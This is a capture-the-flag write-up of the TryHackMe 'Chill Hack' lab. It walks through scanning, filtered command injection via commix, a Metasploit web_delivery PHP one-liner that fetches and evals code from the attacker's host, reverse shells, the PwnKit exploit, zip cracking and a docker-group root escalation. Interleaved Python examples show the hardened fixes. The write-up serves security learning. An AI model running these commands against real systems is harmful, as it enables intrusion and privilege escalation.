Chill Hack TryHackMe

Introduction

alwannn 4K · 10 min read · Dec 1, 2022

Hi, back again with me :D In this post I'll try to solve another TryHackMe box. Start the machine and let's get going.

Enumeration

Start with a port scan for open services.

woonz@localhost /home/woonz/Public/chillhack
⚡ cat nmap.txt
# Nmap 7.93 scan initiated Mon Nov 28 13:28:35 2022 as: nmap -sC -sV -oN nmap.txt 10.10.254.77
Nmap scan report for 10.10.254.77
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.18.3.26
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09f95db918d0b23a822d6e768cc20144 (RSA)
| 256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_ 256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 28 13:35:04 2022 -- 1 IP address (1 host up) scanned in 389.32 seconds

There are 3 open ports, 21, 22 and 80. It looks like we can log in to FTP and grab note.txt.

woonz@localhost /home/woonz/Public/chillhack
⚡ ftp 10.10.254.77
Connected to 10.10.254.77.
220 (vsFTPd 3.0.3)
Name (10.10.254.77:woonz): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||47016|)
150 Here comes the directory listing.
-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||25242|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |****************************************************************************************************************| 90 906.08 KiB/s 00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (0.28 KiB/s)
ftp> exit
221 Goodbye.

woonz@localhost /home/woonz/Public/chillhack
⚡ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar

Hmm, interesting, something is being hidden. Let's try to find where that URL is: explore port 80 for more information.

Nothing interesting, just an ordinary page. Next we'll try directory brute-forcing with Gobuster.

woonz@localhost /home/woonz/Public/chillhack
⚡ gobuster dir -u http://10.10.254.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.254.77/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/28 13:48:17 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://10.10.254.77/images/]
/css (Status: 301) [Size: 310] [--> http://10.10.254.77/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.254.77/js/]
/fonts (Status: 301) [Size: 312] [--> http://10.10.254.77/fonts/]
/secret (Status: 301) [Size: 313] [--> http://10.10.254.77/secret/]

A secret folder shows up; let's head there.

Hmm, this is command injection. Exactly as the note.txt clue says, the input is filtered, so some commands can't be executed: for example ifconfig gets through, while cat /etc/passwd does not and the page responds as shown below.
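The filter the note hints at is a classic string denylist, and that is why it can be bypassed: the filtered string still reaches a shell, so shell metacharacters are interpreted exactly as before. The Python below is an added example (not code from the box, from TryHackMe or from commix) that imitates the observed behaviour, ifconfig passes and cat /etc/passwd is rejected, and sets it beside the design that actually removes the injection: a fixed allow-list of actions mapped to argv lists and executed without a shell. The DENYLIST words and the ALLOWED table are assumptions.

```python
import subprocess

# Constructed denylist imitating the kind of filter the note describes.
# This is NOT the Chill Hack application's code; it only reproduces what was
# observed on the page: "ifconfig" passes, "cat /etc/passwd" is rejected.
DENYLIST = ("cat", "head", "tail", "more", "less", "nano", "vi")


def denylist_filter(user_input: str) -> bool:
    """Return True if the (insecure) denylist filter lets the input through."""
    return not any(word in user_input for word in DENYLIST)


def build_shell_command(user_input: str):
    """Vulnerable pattern: hand the filtered string to a shell (what PHP's
    shell_exec() does). Returns the argv the shell would be started with, or
    None when the filter blocks the input. Note that ';' and friends are never
    inspected, so 'id;echo hello' is forwarded untouched."""
    if not denylist_filter(user_input):
        return None
    return ["/bin/sh", "-c", user_input]


# Hardened form: the user chooses an action by name; the action is mapped to a
# fixed argv list and executed with shell=False, so no user-controlled byte is
# ever parsed by a shell. Assumed action table for the example.
ALLOWED = {
    "id": ["id"],
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}


def plan_command(user_input: str):
    """Return the argv list for an allow-listed action, or None for anything else
    (unknown names, extra arguments, metacharacters)."""
    return ALLOWED.get(user_input.strip())


def run_allowed(user_input: str) -> str:
    """Execute an allow-listed action without a shell and return its stdout."""
    argv = plan_command(user_input)
    if argv is None:
        return "command not permitted"
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for probe in ("ifconfig", "cat /etc/passwd", "id;echo hello"):
        print(f"denylist -> {probe!r}: {build_shell_command(probe)}")
        print(f"allowlist -> {probe!r}: {plan_command(probe)}")
```

The denylist version lets `id;echo hello` through because none of its words match, which is the same weakness the injection probe on this page relies on; the allow-list version rejects it because the whole input is looked up as an action name rather than parsed.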

No worries, we'll use a very powerful tool, commix, to handle the filtered command injection.

woonz@localhost /home/woonz/Public/chillhack
⚡ commix -u http://10.10.254.77/secret/ --data="command=id"
__
___ ___ ___ ___ ___ ___ /\_\ __ _
/`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\ v3.5-stable
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </
\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com
\/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--
Automated All-in-One OS Command Injection Exploitation Tool
Copyright © 2014-2022 Anastasios Stasinopoulos (@ancst)
+--

(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

[14:24:32] [info] Testing connection to the target URL.
[14:24:35] [info] Performing identification checks to the target URL.
[14:24:36] [info] Setting POST parameter 'command' for tests.
[14:24:38] [info] Heuristic (basic) tests shows that POST parameter 'command' might be injectable (possible OS: 'Unix-like').
A previously stored session has been held against that target. Do you want to resume to (results-based) classe to (results-based) classic command injection point? [Y/n] > Y
[14:24:41] [info] POST parameter 'command' appears to be injectable via (results-based) classic command injection technique.
|_ id;echo GAQAAL$((67+65))$(echo GAQAAL)GAQAAL
POST parameter 'command' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > Y
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell) > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aurick:x:1000:1000:Anurodh:/home/aurick:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
apaar:x:1001:1001:,,,:/home/apaar:/bin/bash
anurodh:x:1002:1002:,,,:/home/anurodh:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
commix(os_shell) >

Yes! We finally have arbitrary OS command execution :D

Next I'll migrate to a better payload. Here we'll use Metasploit's very handy web_delivery module to deliver it.

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.18.3.26:4444
[*] Using URL: http://10.18.3.26:8080/mxzrCkWp3WF
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.18.3.26:8080/mxzrCkWp3WF', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

Paste the payload below, generated by web_delivery, into the os-shell that commix gave us and a Meterpreter session comes back right away.

php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.18.3.26:8080/mxzrCkWp3WF', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
[*] 10.10.254.77 web_delivery - Delivering Payload (1111 bytes)
[*] Sending stage (39927 bytes) to 10.10.254.77
[*] Meterpreter session 2 opened (10.18.3.26:4444 -> 10.10.254.77:55342) at 2022-11-28 14:26:04 -0500
msf6 exploit(multi/script/web_delivery)

We've upgraded to a better shell.

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter php/linux www-data @ ubuntu 10.18.3.26:4444 -> 10.10.254.77:55346 (10.10.254.77)

msf6 exploit(multi/script/web_delivery) >

Logged in as the www-data user, I ran the enumeration tool linpeas and found something interesting...

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh

We can run the .helpline.sh file with apaar's privileges.

meterpreter > shell
Process 2110 created.
Channel 3 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
ww-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: loli
loli
Hello user! I am loli, Please enter your message: /tmp/shell.elf
/tmp/shell.elf

Above, I gave the path of a payload file I built with msfvenom as the message; the script ran it as the apaar user and I got a Meterpreter session.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.18.3.26:5555
[*] Meterpreter session 3 opened (10.18.3.26:5555 -> 10.10.254.77:34054) at 2022-11-28 14:51:21 -0500

meterpreter > getuid
Server username: apaar
meterpreter >
meterpreter > shell
Process 2110 created.
Channel 3 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
apaar@ubuntu:~$ ls -la
ls -la
total 44
drwxr-xr-x 5 apaar apaar 4096 Oct 4 2020 .
drwxr-xr-x 5 root root 4096 Oct 3 2020 ..
-rw------- 1 apaar apaar 0 Oct 4 2020 .bash_history
-rw-r--r-- 1 apaar apaar 220 Oct 3 2020 .bash_logout
-rw-r--r-- 1 apaar apaar 3771 Oct 3 2020 .bashrc
drwx------ 2 apaar apaar 4096 Oct 3 2020 .cache
drwx------ 3 apaar apaar 4096 Oct 3 2020 .gnupg
-rwxrwxr-x 1 apaar apaar 286 Oct 4 2020 .helpline.sh
-rw-r--r-- 1 apaar apaar 807 Oct 3 2020 .profile
drwxr-xr-x 2 apaar apaar 4096 Oct 3 2020 .ssh
-rw------- 1 apaar apaar 817 Oct 3 2020 .viminfo
-rw-rw---- 1 apaar apaar 46 Oct 4 2020 local.txt
apaar@ubuntu:~$ cat .local.txt
cat .local.txt
cat: .local.txt: No such file or directory
apaar@ubuntu:~$ cat local.txt
cat local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
apaar@ubuntu:~$

First flag found. Next, let's escalate our privileges further.

Here I'll look for a local exploit with Metasploit's local exploit suggester module, which turned up several local vulnerabilities.

msf6 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.254.77 - Collecting local exploits for x86/linux...
[*] 10.10.254.77 - 174 exploit checks are being tried...
[+] 10.10.254.77 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.254.77 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
[+] 10.10.254.77 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.254.77 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.254.77 - exploit/linux/local/ubuntu_enlightenment_mount_priv_esc: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] 10.10.254.77 - Valid modules for session 3:

I'll try the pwnkit exploit.

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit

[*] Started reverse TCP handler on 10.18.3.26:7667
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ndtqumkf
[+] The target is vulnerable.
[*] Writing '/tmp/.tkecjwbrzgam/ngzkeuvckae/ngzkeuvckae.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.tkecjwbrzgam
[*] Sending stage (3045348 bytes) to 10.10.254.77
[*] Meterpreter session 4 opened (10.18.3.26:7667 -> 10.10.254.77:43094) at 2022-11-28 15:06:12 -0500

meterpreter > getuid
Server username: root

And we got a root shell. Honestly, I think that was too fast.

Here I found 2 directories in the /var/www/data folder; I think it's a separate website hosted on localhost only.

Let's reach it by opening an SSH tunnel to forward the port.

woonz@localhost /home/woonz/Public/chillhack
⚡ ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@10.10.182.37
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Dec 1 19:21:56 UTC 2022

System load: 0.0 Processes: 124
Usage of /: 24.8% of 18.57GB Users logged in: 0
Memory usage: 21% IP address for eth0: 10.10.182.37
Swap usage: 0% IP address for docker0: 172.17.0.1

=> There are 2 zombie processes.


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

19 packages can be updated.
0 updates are security updates.


Last login: Sun Oct 4 14:05:57 2020 from 192.168.184.129
apaar@ubuntu:~$

Connected. Let's open the web browser and navigate to localhost:9001, the port we just forwarded.

It shows a login page. Let's test it with SQL login bypass techniques: I took a payload list from GitHub, brute-forced it and compared the differing responses with a tool like Burp.

One payload came back with a different length from the rest. Let's try it.
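The reason a response-length comparison finds a bypass at all is that the login handler splices the submitted values into the SQL text, so a quote in the input changes the query's meaning. As an added example (not the box's source and not the page author's code), the Python below builds a tiny in-memory SQLite user table with one constructed account and shows the vulnerable handler next to the parameterised one; the table, the account and the `users` schema are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory user table with one constructed account (not the box's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("admin@example.test", "constructed-secret"),
    )
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Vulnerable pattern: user input is concatenated into the SQL text, so a
    quote in either field rewrites the WHERE clause."""
    query = (
        f"SELECT COUNT(*) FROM users WHERE email = '{email}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Hardened form: bound parameters; quotes in the input stay data and the
    query structure is fixed before any user value is seen."""
    query = "SELECT COUNT(*) FROM users WHERE email = ? AND password = ?"
    return conn.execute(query, (email, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # the classic shape a bypass wordlist probes with
    print("unsafe, tautology:", login_unsafe(db, "admin@example.test", tautology))
    print("safe,   tautology:", login_safe(db, "admin@example.test", tautology))
    print("safe,   real creds:", login_safe(db, "admin@example.test", "constructed-secret"))
```

With the unsafe handler the tautology makes `COUNT(*)` non-zero for every account, which is exactly the "different length" response the Burp comparison picks out; with bound parameters the same input is just a password that matches nothing. The plaintext password column is kept only so the two handlers differ in one thing; real storage should hash the password, which is covered further down.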

Logged in. The clue on the page is clear enough: let's download the picture of the hacker holding a laptop and take a closer look with steghide.

woonz@localhost /home/woonz/Public/chillhack
⚡ steghide info hacker-with-laptop_23-2147985341.jpg
"hacker-with-laptop_23-2147985341.jpg":
format: jpeg
capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "backup.zip":
size: 750.0 Byte
encrypted: rijndael-128, cbc
compressed: yes

Wow, a zip file is stored inside the image. Let's extract it.

⚡ steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
the file "backup.zip" does already exist. overwrite ? (y/n) y
wrote extracted data to "backup.zip".
woonz@localhost /home/woonz/Public/chillhack
⚡ unzip backup.zip
Archive: backup.zip
[backup.zip] source_code.php password:

Unfortunately it isn't that easy; the archive is password-protected. Let's try to crack it with John the Ripper.

woonz@localhost /home/woonz/Public/chillhack
⚡ zip2john backup.zip > hash.backup
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8

woonz@localhost /home/woonz/Public/chillhack
⚡ john hash.backup --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)

woonz@localhost /home/woonz/Public/chillhack
⚡ john hash.backup --show
backup.zip/source_code.php:pass1word:source_code.php:backup.zip::backup.zip

1 password hash cracked, 0 left

Cracked. Extract the zip and read source_code.php: one line compares against a base64 value, so let's decode it.

<?php
if(isset($_POST['submit']))
{
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "IWQwb****bVlwQHNzdzByZA==")

woonz@localhost /home/woonz/Public/chillhack
⚡ echo IWQwbnRLbjB3b*****NzdzByZA== | base64 -d
!d0ntKn***p@ssw0rd%

With that password we log in as the anurodh user.
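The check in source_code.php is the real lesson of this step: base64 is an encoding, not a hash, so whoever reads the source reads the password, and PHP's loose `==` adds a second weakness. The Python below is an added example (not the box's PHP and not the page author's code) that reproduces the weak pattern and sets a salted PBKDF2 verifier with a constant-time comparison beside it. The password, salt handling and iteration count are assumptions for the example.

```python
import base64
import hashlib
import hmac
import os

# Assumed work factor for the example; tune to the deployment's hardware.
ITERATIONS = 210_000


def base64_check(submitted: str, stored_b64: str) -> bool:
    """The weak pattern from source_code.php, transcribed to Python: compare the
    base64 of the submitted password with a constant kept in the source."""
    return base64.b64encode(submitted.encode()) == stored_b64.encode()


def recover_from_base64(stored_b64: str) -> str:
    """Why the pattern fails: the stored value decodes straight back to the
    password, which is what the `base64 -d` step above did."""
    return base64.b64decode(stored_b64).decode()


def hash_password(password: str, salt: bytes = b"") -> str:
    """Hardened form: random per-user salt, slow PBKDF2-SHA256, self-describing
    storage string 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant
    time so a timing difference cannot leak how many bytes matched."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    secret = "constructed-p@ss"  # constructed sample, not the box's password
    stored_weak = base64.b64encode(secret.encode()).decode()
    print("base64 'protects' the password?  recovered:", recover_from_base64(stored_weak))
    stored_strong = hash_password(secret)
    print("stored hash:", stored_strong)
    print("verify correct:", verify_password(secret, stored_strong))
    print("verify wrong:  ", verify_password("guess", stored_strong))
```

Two users with the same password get different stored strings because of the salt, and nothing in the stored string lets the source reader walk back to the password, which is the property the PHP check lacked.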

apaar@ubuntu:/home$ ls
anurodh apaar aurick
apaar@ubuntu:/home$ su anurodh
Password:
anurodh@ubuntu:/home$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
anurodh@ubuntu:/home$

Docker is present and we're in the docker group, so let's look up docker on GTFOBins.

anurodh@ubuntu:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
id
id
# uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# whoami
root
#

And we got root :D
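Both privilege-escalation paths on this box are configuration findings a defender can audit before anyone else does: a NOPASSWD sudo rule whose target is a group-writable script under a home directory, and a non-root user in the docker group (which is equivalent to root, since the daemon mounts whatever it is asked to). The Python below is an added example (not the page author's code, not linpeas) that parses `sudo -l` output and `/etc/group` content; its sample inputs are constructed to mirror what this writeup found, and the `FILE_INFO` table stands in for `stat` results.

```python
import re

# Constructed sample of `sudo -l` output, modelled on the linpeas finding above.
SUDO_L = """Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
    (root) /usr/bin/id
"""

# Constructed stand-in for stat(): path -> (ls -l mode string, owner).
# The .helpline.sh entry copies the mode/owner from the listing above.
FILE_INFO = {
    "/home/apaar/.helpline.sh": ("-rwxrwxr-x", "apaar"),
    "/usr/bin/id": ("-rwxr-xr-x", "root"),
}

# Constructed /etc/group excerpt; gid 999 for docker matches the id output above.
ETC_GROUP = """docker:x:999:anurodh
sudo:x:27:aurick
"""

# Matches "(runas) TAG: TAG: /absolute/command"; non-path rules such as ALL are skipped.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)")


def audit_sudo_rules(sudo_l_text: str, file_info: dict) -> list:
    """Flag sudo command rules that are passwordless, point at files not owned
    by root, are group/world writable, or live under /home."""
    findings = []
    for line in sudo_l_text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        mode, owner = file_info.get(cmd, ("?", "?"))
        reasons = []
        if "NOPASSWD" in m.group("tags"):
            reasons.append("NOPASSWD")
        if owner != "root":
            reasons.append(f"owned by {owner}, not root")
        if len(mode) == 10 and (mode[5] == "w" or mode[8] == "w"):
            reasons.append("group/world writable")
        if cmd.startswith("/home/"):
            reasons.append("lives under /home")
        if reasons:
            findings.append({"command": cmd, "runas": m.group("runas").strip(), "reasons": reasons})
    return findings


def docker_group_members(etc_group_text: str) -> list:
    """Return the users listed as members of the docker group."""
    for line in etc_group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L, FILE_INFO):
        print(f"sudo rule {f['command']} as ({f['runas']}): {', '.join(f['reasons'])}")
    for user in docker_group_members(ETC_GROUP):
        print(f"docker group member (root-equivalent): {user}")
```

On a live host you would feed the function the real `sudo -l` text and `/etc/group`, and build `FILE_INFO` from `os.stat`; the `(root) /usr/bin/id` rule produces no finding, which shows the checks are about ownership, writability and location rather than about sudo itself.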

That's all from me, see you in the next post :DDD
